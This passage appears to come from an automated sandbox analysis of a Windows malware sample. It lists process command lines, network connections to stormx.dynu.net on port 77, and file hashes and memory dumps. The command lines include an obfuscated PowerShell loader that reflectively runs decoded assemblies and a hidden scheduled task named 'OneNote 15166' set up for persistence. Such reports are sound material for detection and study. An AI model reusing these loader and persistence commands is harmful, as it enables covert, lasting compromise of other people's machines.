5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\timeout.exe

timeout /nobreak /t 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network15166Man')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 13.107.21.237:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp
US | 8.8.8.8:53 | stormx.dynu.net | udp
DE | 94.130.130.51:77 | stormx.dynu.net | tcp
DE | 94.130.130.51:77 | stormx.dynu.net | tcp
US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp
DE | 94.130.130.51:77 | stormx.dynu.net | tcp

Files

memory/1916-0-0x0000000074F2E000-0x0000000074F2F000-memory.dmp

memory/1916-1-0x0000000004CD0000-0x0000000004D06000-memory.dmp

memory/1916-3-0x0000000005340000-0x0000000005968000-memory.dmp

memory/1916-2-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/1916-4-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/1916-5-0x00000000052C0000-0x00000000052E2000-memory.dmp

memory/1916-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

memory/1916-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puf2xrl2.0of.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1916-17-0x0000000005C40000-0x0000000005F94000-memory.dmp

memory/1916-18-0x00000000061C0000-0x00000000061DE000-memory.dmp

memory/1916-19-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/1916-20-0x0000000006720000-0x0000000006764000-memory.dmp

memory/1916-21-0x00000000074A0000-0x0000000007516000-memory.dmp

memory/1916-22-0x0000000007BA0000-0x000000000821A000-memory.dmp

memory/1916-23-0x0000000007540000-0x000000000755A000-memory.dmp

memory/3444-24-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/3444-25-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/3444-26-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/3444-38-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/1916-39-0x0000000007620000-0x0000000007630000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 938ffc2cba917b243d86b2cf76dcefb4
SHA1 234b53d91d075f16cc63c731eefdae278e2faad3
SHA256 5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca
SHA512 e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

memory/4824-50-0x0000000007AB0000-0x0000000007AE2000-memory.dmp

memory/4824-51-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

memory/4824-61-0x0000000007A90000-0x0000000007AAE000-memory.dmp

memory/4824-62-0x0000000007B00000-0x0000000007BA3000-memory.dmp

memory/4824-63-0x0000000007CC0000-0x0000000007CCA000-memory.dmp

memory/4824-64-0x0000000007EE0000-0x0000000007F76000-memory.dmp

memory/4824-65-0x0000000007E50000-0x0000000007E61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bc5e40517fe8f3f73fdd3a27d4fe7d6d
SHA1 0b0ea9ee27a747a5b6a4121de931dd15f0429bb4
SHA256 a7e28126148286b23e0a2e3146d2c7a7a4b5d780cc8ff50bb4e3f4c7f486a8c4
SHA512 c169fbf7c0a722abffd7802bbfc7559adacc3e7ba9ffcfe2825f2055d8860f8ddf90aa5ecffb2c9b7e8bdb409479870c463048af1d98e161ad854644f45f0eaf

memory/800-77-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ca86c56c43469d64429b0ceac9a6244a
SHA1 096af882cffc54003eb90c70ea0e7430bab218ce
SHA256 8e9e05e948ea3ae93545f3c079e718a24d2b3224fa1686eae5fbe3621d74059c
SHA512 634c878e298022da59fdcc2c33b6514bf5d45d6e4d893d2646c63e1922e5066c98b88d7c09256e6aadeba18012406fb896ff2b337eb16f886d162493979adeeb

C:\Users\Admin\AppData\Roaming\Network15166Man.cmd

MD5 3dfb1c3ff09dc31a4096b821b9ff204b
SHA1 8604c300175bf352b7612412c6521064a2514674
SHA256 a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b
SHA512 895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172

memory/1916-111-0x0000000074F20000-0x00000000756D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 86340a2269cc2e3ed5f72aff7c6e87b7
SHA1 ed4e05673352bf376a4ea5a0a3c81e935f68bbd7
SHA256 1238383796584fcf9f5bfd63424b06b685dc73b18edf53bf52114cdc58363ffc
SHA512 9df41060170fed81a12aca98c3f6183201c3636bb1f76f7e2b3ccb7d0be66b523bb16f28d8d1501238bcf9b2bca527c84c206334239b0ee2566286b782c705ca

memory/4212-123-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

memory/4212-133-0x00000000072E0000-0x0000000007383000-memory.dmp

memory/4212-134-0x0000000007640000-0x0000000007651000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 632280a520f1aaf45cee26c44f846468
SHA1 69f0e1002e99101089e42072f0c8505a5f542353
SHA256 122dbb93b1e8f381b06abf0cb7901ea14709b57c941b2e16abb4c2d70efd1018
SHA512 94237bdbdd13df82ca75362878fee31f8ca9952c872cd2961f27ee99d9bf9f4718e9bfab12f4e59a520ee10fdbc10596d995f2dcbfc2117a3389012b61078eed

memory/4344-146-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

memory/464-157-0x0000000005290000-0x00000000052A6000-memory.dmp

memory/464-158-0x0000000008B60000-0x0000000009104000-memory.dmp

memory/464-159-0x0000000007E70000-0x0000000007F02000-memory.dmp

memory/464-160-0x0000000007E50000-0x0000000007E5A000-memory.dmp